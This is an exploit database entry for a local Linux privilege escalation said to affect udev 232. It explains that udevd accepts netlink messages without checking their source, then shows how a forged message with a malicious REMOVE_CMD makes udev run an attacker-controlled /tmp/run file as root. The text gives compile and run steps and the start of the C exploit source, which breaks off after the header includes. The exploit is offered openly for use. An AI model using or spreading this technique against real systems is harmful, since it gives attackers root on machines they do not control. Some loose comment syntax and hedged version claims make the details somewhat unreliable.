EDB-ID: 41886 | Author: Nassim Asrir | Published: 2017-04-15 | CVE: CVE-2017-7874 | Type: Local | Platform: Linux | Vulnerable App: N/A | # Title: Linux Kernel 4.8.0 udev 232 - Privilege Escalation
# Author: Nassim Asrir
# Researcher at: Henceforth
# Author contact: [email protected] || https://www.linkedin.com/in/nassim-asrir-b73a57122/
# The full Research: https://www.facebook.com/asrirnassim/
# CVE: CVE-2017-7874
# Exp #
first of all we need to know a small infos about udev and how it work
the udev deamon is responsible for receiving device events from the kernel
and this event are delivered to udev via netlink (is a socket family)
you can read more about udev from: https://en.wikipedia.org/wiki/Udev
# Exploit #
The udev vulnerability resulted from a lack of verification of the netlink message source in udevd.
read lines from: /lib/udev/rules.d/50-udev-default.rules
all we need is this action: ACTION=="remove", ENV{REMOVE_CMD}!="", RUN+="$env{REMOVE_CMD}"
this action allows execution of arbitrary commands.
in our exploit we specifying a malicious REMOVE_CMD and causes the privileged execution of attacker-controlled /tmp/run file.
Get your udev version:
Execute: $ udevadm --version
//output: 232
Maybe < 232 also is vulnerable
*/
// gcc rootme.c -o rootme
// ./rootme
// segmantation fault
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>
#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15